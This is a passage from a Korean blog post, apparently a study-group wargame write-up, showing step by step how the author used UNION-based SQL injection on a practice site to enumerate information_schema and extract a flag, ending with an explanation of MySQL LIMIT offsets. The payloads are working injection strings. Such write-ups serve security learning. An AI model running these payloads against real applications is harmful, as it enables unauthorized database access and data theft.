<p><code class="language-plaintext highlighter-rouge">' OR '1'='1-- </code>  입력해봤더니 <code class="language-plaintext highlighter-rouge">doldol</code>의 원래 계정대로 출력되는 것을 확인할 수 있었습니다.</p>

<p><a href="https://github.com/user-attachments/assets/c1126c8b-2fff-4213-bae1-d7d3f5a5c4ae" class="popup img-link  shimmer"><img width="1155" alt="Image" src="https://github.com/user-attachments/assets/c1126c8b-2fff-4213-bae1-d7d3f5a5c4ae" loading="lazy"></a></p>

<p><code class="language-plaintext highlighter-rouge">doldol' UNION SELECT 1,2,3,4,5,6-- </code>를 입력하여 컬럼이 6개라는 것을 확인했습니다. 
<a href="https://github.com/user-attachments/assets/9a5de7b2-6b75-44ef-85ce-3016283d22ac" class="popup img-link  shimmer"><img width="1161" alt="Image" src="https://github.com/user-attachments/assets/9a5de7b2-6b75-44ef-85ce-3016283d22ac" loading="lazy"></a></p>

<p><code class="language-plaintext highlighter-rouge">doldol' and '1' ='0' UNION SELECT 1,2,3,4,5,6-- </code>
Info부분에 6이 찍히는 것을 확인할 수 있습니다. 
<a href="https://github.com/user-attachments/assets/fabf6106-9485-4ed5-95d1-1d6c48a8fe55" class="popup img-link  shimmer"><img width="1156" alt="Image" src="https://github.com/user-attachments/assets/fabf6106-9485-4ed5-95d1-1d6c48a8fe55" loading="lazy"></a></p>

<p><code class="language-plaintext highlighter-rouge">doldol' and '1' ='0' UNION SELECT 1,2,3,4,5,database()-- </code>
DB 이름이 sqli_5 라는 것을 확인할 수 있습니다.
<a href="https://github.com/user-attachments/assets/d00cfe96-5a49-49ee-bc5a-f4ebcde4e707" class="popup img-link  shimmer"><img width="1168" alt="Image" src="https://github.com/user-attachments/assets/d00cfe96-5a49-49ee-bc5a-f4ebcde4e707" loading="lazy"></a></p>

<div class="language-sql highlighter-rouge"><div class="code-header">
        <span data-label-text="Sql"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="n">doldol</span><span class="s1">' and '</span><span class="mi">1</span><span class="s1">' ='</span><span class="mi">0</span><span class="s1">' UNION SELECT 1,2,3,4,5,table_name FROM information_schema.tables WHERE table_schema='</span><span class="n">sqli_5</span><span class="s1">'-- 
</span></pre></td></tr></tbody></table></code></div></div>
<blockquote>
  <p>테이블 이름이 flag_honey 라는 것을 확인 
<a href="https://github.com/user-attachments/assets/c9326907-2abc-4960-94ed-0da66ac5f188" class="popup img-link  shimmer"><img width="1142" alt="Image" src="https://github.com/user-attachments/assets/c9326907-2abc-4960-94ed-0da66ac5f188" loading="lazy"></a></p>
</blockquote>

<div class="language-sql highlighter-rouge"><div class="code-header">
        <span data-label-text="Sql"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="n">doldol</span><span class="s1">' and '</span><span class="mi">1</span><span class="s1">' ='</span><span class="mi">0</span><span class="s1">' UNION SELECT 1,2,3,4,5,column_name FROM information_schema.columns WHERE table_name='</span><span class="n">flag_honey</span><span class="s1">'-- 
</span></pre></td></tr></tbody></table></code></div></div>
<blockquote>
  <p>flag_honey 테이블에서 flag를 발견
<a href="https://github.com/user-attachments/assets/6dc80c99-7926-46d9-95d7-052aa429cad8" class="popup img-link  shimmer"><img width="1145" alt="Image" src="https://github.com/user-attachments/assets/6dc80c99-7926-46d9-95d7-052aa429cad8" loading="lazy"></a></p>
</blockquote>

<div class="language-sql highlighter-rouge"><div class="code-header">
        <span data-label-text="Sql"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="n">doldol</span><span class="s1">' and '</span><span class="mi">1</span><span class="s1">' ='</span><span class="mi">0</span><span class="s1">' UNION SELECT 1,2,3,4,5,flag FROM flag_honey-- 
</span></pre></td></tr></tbody></table></code></div></div>
<blockquote>
  <p>하핳 아니라네 ;ㅁ;
<a href="https://github.com/user-attachments/assets/ab915c23-1d40-4a97-b22d-97776372ee7a" class="popup img-link  shimmer"><img width="1149" alt="Image" src="https://github.com/user-attachments/assets/ab915c23-1d40-4a97-b22d-97776372ee7a" loading="lazy"></a></p>
</blockquote>

<div class="language-sql highlighter-rouge"><div class="code-header">
        <span data-label-text="Sql"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="n">doldol</span><span class="s1">' and '</span><span class="mi">1</span><span class="s1">' ='</span><span class="mi">0</span><span class="s1">' UNION SELECT 1,2,3,4,5,table_name FROM information_schema.tables--
</span></pre></td></tr></tbody></table></code></div></div>
<blockquote>
  <p>어디서 놓친게 있나 생각해봐도 없는데 information_schema.tables에 where 조건문을 안쓰면 테이블이 왕창 나온다는 것을 기억하고 확인해보니 CHARACTER_SETS 테이블이 있는 것을 확인</p>
</blockquote>

<p><a href="https://github.com/user-attachments/assets/9ed76ed7-ada8-4001-a22e-eeaada16c9aa" class="popup img-link  shimmer"><img width="1171" alt="Image" src="https://github.com/user-attachments/assets/9ed76ed7-ada8-4001-a22e-eeaada16c9aa" loading="lazy"></a></p>

<h3 id="-여기서부터-삽질의-하이라이트"><span class="me-2">❗ 여기서부터 삽질의 하이라이트</span><a href="#-여기서부터-삽질의-하이라이트" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<div class="language-sql highlighter-rouge"><div class="code-header">
        <span data-label-text="Sql"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="n">doldol</span><span class="s1">' and '</span><span class="mi">1</span><span class="s1">' ='</span><span class="mi">0</span><span class="s1">' UNION SELECT 1,2,3,4,5,column_name FROM information_schema.columns WHERE table_name='</span><span class="n">CHARACTER_SETS</span><span class="s1">'--
</span></pre></td></tr></tbody></table></code></div></div>
<blockquote>
  <p>CHARACTER_SET_NAME 컬럼 발견
<a href="https://github.com/user-attachments/assets/f1c5eed3-1c11-4373-b2bd-e7adeac12530" class="popup img-link  shimmer"><img width="1127" alt="Image" src="https://github.com/user-attachments/assets/f1c5eed3-1c11-4373-b2bd-e7adeac12530" loading="lazy"></a></p>
</blockquote>

<div class="language-sql highlighter-rouge"><div class="code-header">
        <span data-label-text="Sql"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="n">doldol</span><span class="s1">' and '</span><span class="mi">1</span><span class="s1">' ='</span><span class="mi">0</span><span class="s1">' UNION SELECT 1,2,3,4,5,CHARACTER_SET_NAME FROM CHARACTER_SETS-- 
</span></pre></td></tr></tbody></table></code></div></div>
<blockquote>
  <p>이렇게 했더니 안나온다 왜?!?!?!?!?!?!?</p>
</blockquote>

<p><code class="language-plaintext highlighter-rouge">doldol' AND 1=0 UNION SELECT 1,2,3,4,5,user()-- </code></p>
<blockquote>
  <p>이게 또 database()만 있는게 아니구나 
<a href="https://github.com/user-attachments/assets/f5eab93f-3b99-4071-bbb9-8843a1f0b798" class="popup img-link  shimmer"><img width="1157" alt="Image" src="https://github.com/user-attachments/assets/f5eab93f-3b99-4071-bbb9-8843a1f0b798" loading="lazy"></a></p>
</blockquote>

<div class="language-sql highlighter-rouge"><div class="code-header">
        <span data-label-text="Sql"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="n">doldol</span><span class="s1">' and '</span><span class="mi">1</span><span class="s1">'='</span><span class="mi">0</span><span class="s1">' UNION SELECT 1,2,3,4,5,table_name FROM information_schema.tables LIMIT 1,1-- 
</span></pre></td></tr></tbody></table></code></div></div>
<blockquote>
  <p>information_schema.tables 에서 하나만 나온다는게 Limit 가 걸려있다는 거였는데 너무 늦게 알았다..</p>
</blockquote>

<p><a href="https://github.com/user-attachments/assets/a84caa94-4b7f-438d-9ca9-bfce2e48b644" class="popup img-link  shimmer"><img width="1138" alt="Image" src="https://github.com/user-attachments/assets/a84caa94-4b7f-438d-9ca9-bfce2e48b644" loading="lazy"></a></p>

<h3 id="정신-차린-구간"><span class="me-2">정신 차린 구간</span><a href="#정신-차린-구간" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<div class="language-sql highlighter-rouge"><div class="code-header">
        <span data-label-text="Sql"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="n">doldol</span><span class="s1">' AND '</span><span class="mi">1</span><span class="s1">'='</span><span class="mi">0</span><span class="s1">' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema != '</span><span class="n">mysql</span><span class="s1">' AND table_schema != '</span><span class="n">information_schema</span><span class="s1">'--
</span></pre></td></tr></tbody></table></code></div></div>
<blockquote>
  <p>flag_honey 테이블 말고도 game_user,secret 존재한다는 것을 확인 
<a href="https://github.com/user-attachments/assets/31aa482f-907e-410d-aed4-0b3b285b1627" class="popup img-link  shimmer"><img width="1141" alt="Image" src="https://github.com/user-attachments/assets/31aa482f-907e-410d-aed4-0b3b285b1627" loading="lazy"></a></p>
</blockquote>

<div class="language-sql highlighter-rouge"><div class="code-header">
        <span data-label-text="Sql"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="n">doldol</span><span class="s1">' and '</span><span class="mi">1</span><span class="s1">' ='</span><span class="mi">0</span><span class="s1">' UNION SELECT 1,2,3,4,5,column_name FROM information_schema.columns WHERE table_name='</span><span class="n">secret</span><span class="s1">'-- 
</span></pre></td></tr></tbody></table></code></div></div>
<blockquote>
  <p>수상해보이는 sceret 테이블에서 flag 컬럼을 확인했습니다.
<a href="https://github.com/user-attachments/assets/32a7d3b5-0ca0-4439-a0b6-ed436da71030" class="popup img-link  shimmer"><img width="1145" alt="Image" src="https://github.com/user-attachments/assets/32a7d3b5-0ca0-4439-a0b6-ed436da71030" loading="lazy"></a></p>
</blockquote>

<div class="language-sql highlighter-rouge"><div class="code-header">
        <span data-label-text="Sql"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="n">doldol</span><span class="s1">' and '</span><span class="mi">1</span><span class="s1">' ='</span><span class="mi">0</span><span class="s1">' UNION SELECT 1,2,3,4,5,flag FROM secret-- 
</span></pre></td></tr></tbody></table></code></div></div>
<blockquote>
  <p>하핳하.. 또 속았다. 
<a href="https://github.com/user-attachments/assets/897b0be2-2878-45b1-86c6-a6fde2647e87" class="popup img-link  shimmer"><img width="1130" alt="Image" src="https://github.com/user-attachments/assets/897b0be2-2878-45b1-86c6-a6fde2647e87" loading="lazy"></a></p>
</blockquote>

<div class="language-sql highlighter-rouge"><div class="code-header">
        <span data-label-text="Sql"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="n">doldol</span><span class="s1">' and '</span><span class="mi">1</span><span class="s1">' ='</span><span class="mi">0</span><span class="s1">' UNION SELECT 1,2,3,4,5,flag FROM secret LIMIT 1,1-- 
</span></pre></td></tr></tbody></table></code></div></div>
<blockquote>
  <p>휴 드디어 찾았다</p>
</blockquote>

<h3 id="문제에서-배운-것-정리"><span class="me-2">문제에서 배운 것 정리</span><a href="#문제에서-배운-것-정리" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>SQL에서 <code class="language-plaintext highlighter-rouge">LIMIT</code>은 <strong>쿼리 결과의 행 수를 제한</strong>할 때 사용됩니다.<br />
MySQL 기준으로 <code class="language-plaintext highlighter-rouge">LIMIT a, b</code>는 다음을 의미합니다:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">a</code> : <strong>건너뛸 행(row)의 개수</strong> (offset)</li>
  <li><code class="language-plaintext highlighter-rouge">b</code> : <strong>가져올 행(row)의 개수</strong></li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="복사되었습니다!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>... FROM secret LIMIT 0,1--  → 첫 번째 레코드  
... FROM secret LIMIT 1,1--  → 두 번째 레코드  
... FROM secret LIMIT 2,1--  → 세 번째 레코드
</pre></td></tr></tbody></table></code></div></div>
<p>[총 걸린 기간 : 2일]</p>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/pentest/">Pentest</a>,
          <a href="/categories/w6/">W6</a>
      </div>
    

    <!-- tags -->
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          이 기사는 저작권자의 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         라이센스를 따릅니다.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">공유하기</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=%EB%85%B8%EB%A7%90%ED%8B%B1%20%EB%AA%A8%EC%9D%98%ED%95%B4%ED%82%B9%20%EC%8A%A4%ED%84%B0%EB%94%94%206%EC%A3%BC%EC%B0%A8%20%EC%9B%8C%EA%B2%8C%EC%9E%84%20(1)%20sqli1,%20sql2%20-%20woojin&url=https%3A%2F%2Fwoojin03.github.io%2F%2Fposts%2FPenetration-Test-Study-6%281%29%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=%EB%85%B8%EB%A7%90%ED%8B%B1%20%EB%AA%A8%EC%9D%98%ED%95%B4%ED%82%B9%20%EC%8A%A4%ED%84%B0%EB%94%94%206%EC%A3%BC%EC%B0%A8%20%EC%9B%8C%EA%B2%8C%EC%9E%84%20(1)%20sqli1,%20sql2%20-%20woojin&u=https%3A%2F%2Fwoojin03.github.io%2F%2Fposts%2FPenetration-Test-Study-6%281%29%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=https%3A%2F%2Fwoojin03.github.io%2F%2Fposts%2FPenetration-Test-Study-6%281%29%2F&text=%EB%85%B8%EB%A7%90%ED%8B%B1%20%EB%AA%A8%EC%9D%98%ED%95%B4%ED%82%B9%20%EC%8A%A4%ED%84%B0%EB%94%94%206%EC%A3%BC%EC%B0%A8%20%EC%9B%8C%EA%B2%8C%EC%9E%84%20(1)%20sqli1,%20sql2%20-%20woojin" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="링크 복사하기"
      data-title-succeed="링크가 복사되었습니다!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">최근 업데이트</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/Penetration-Test-Study-7(2)/">노말틱 모의해킹 스터디 7주차 워게임 정리</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/Penetration-Test-Study-8(1)/">노말틱 모의해킹 스터디 8주차 강의 정리</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/Penetration-Test-Study-7(1)/">노말틱 모의해킹 스터디 7주차 강의 정리 Error Based SQLi, Blind SQLi</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/Penetration-Test-Study-6(7)/">노말틱 모의해킹 스터디 6주차 워게임 (7) 보안 커뮤니티</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/Penetration-Test-Study-6(4)/">노말틱 모의해킹 스터디 6주차 워게임_보너스</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">인기 태그</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/board/">board</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/pentest/">Pentest</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/sql/">sql</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/artifact/">artifact</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/automation/">automation</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/blog/">blog</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ctf/">CTF</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/forensic/">forensic</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/github-pages/">GitHub Pages</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/jekyll/">Jekyll</a>
      
    </div>
  </section>


            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">바로가기</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
    
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  











  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">관련된 글</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/Penetration-Test-Study-6(7)/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1747666800"
  data-df="YYYY/MM/DD"
  
>
  20/05/2025
</time>

              <h4 class="pt-0 my-2">노말틱 모의해킹 스터디 6주차 워게임 (7) 보안 커뮤니티</h4>
              <div class="text-muted">
                <p>sqli 성공 여부 sql%’and’1%’=’1/ sq%’and’1%’=’2 를 비교해보면 sqli 성공하는 것을 알수있습니다. 1 2 [공격 페이로드 ] sql%&#39;and(공격문)and&#39;1%&#39;=&#39;1  db명 추출 sql%’and(ascii(substr((select+database()),1,1))&amp;gt;0)and’1%’=’1  1 2 3 4 5 6 7...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/Penetration-Test-Study-6(4)/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1747062000"
  data-df="YYYY/MM/DD"
  
>
  13/05/2025
</time>

              <h4 class="pt-0 my-2">노말틱 모의해킹 스터디 6주차 워게임_보너스</h4>
              <div class="text-muted">
                <p>[도박 관리자] 문제에 들어가면 아래와 같은 웹페이지를 확인할 수 있습니다.    웹페이지 url 에서 확인은 못하지만 아래와 같은 경로가 출력되는 것을 알 수 있습니다. 1 GET /spec1/game_info.php?game_name=Lucky%20Slots HTTP/1.1    버프에서 확인한 경로를 url로 입력하면 json 데이터를 확인 할 ...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/Penetration-Test-Study-6(3)/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1746889200"
  data-df="YYYY/MM/DD"
  
>
  11/05/2025
</time>

              <h4 class="pt-0 my-2">노말틱 모의해킹 스터디 6주차 강의 정리</h4>
              <div class="text-muted">
                <p>고민 방식     문제 발생 시!      문제의 원인을 찾아라.   문제를 해결하라.   구글 검색은 영어 기반!            ❌ google.kr       ✅ google.com           SQL 인젝션은 어디에 사용되는가?     DB 데이터를 사용하는 곳   그 데이터가 화면에 출력되는가?                  구분  ...</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <a
      href="/posts/llama3_digital_forensics(1)/"
      class="btn btn-outline-primary"
      aria-label="이전 글"
    >
      <p>LLaMA3 기반 디지털포렌식 아티팩트 분석기 개발 (1)</p>
    </a>
  

  
    <a
      href="/posts/suninatas(1)/"
      class="btn btn-outline-primary"
      aria-label="다음 글"
    >
      <p>SQLD 자격증 준비 (2일차)</p>
    </a>
  
</nav>

            

            <!-- The Footer -->
<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2025</time>

    
      <a href="https://github.com/woojin03">woojin</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="명시되지 않는 한 이 사이트의 블로그 게시물은 작성자의 Creative Commons Attribution 4.0 International(CC BY 4.0) 라이선스에 따라 사용이 허가되었습니다."
      >일부 권리 보유</span>
    
  </p>

  <p class="d-flex align-items-center gap-3">
    <!-- Guestbook icon -->
    <a href="/guestbook/" aria-label="방명록" title="방명록">
      <i class="fas fa-book-open"></i>
    </a>Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.4"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">인기 태그</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/board/">board</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/pentest/">Pentest</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/sql/">sql</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/artifact/">artifact</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/automation/">automation</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/blog/">blog</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ctf/">CTF</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/forensic/">forensic</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/github-pages/">GitHub Pages</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/jekyll/">Jekyll</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">새 버전의 콘텐츠를 사용할 수 있습니다.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      업데이트
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->

  
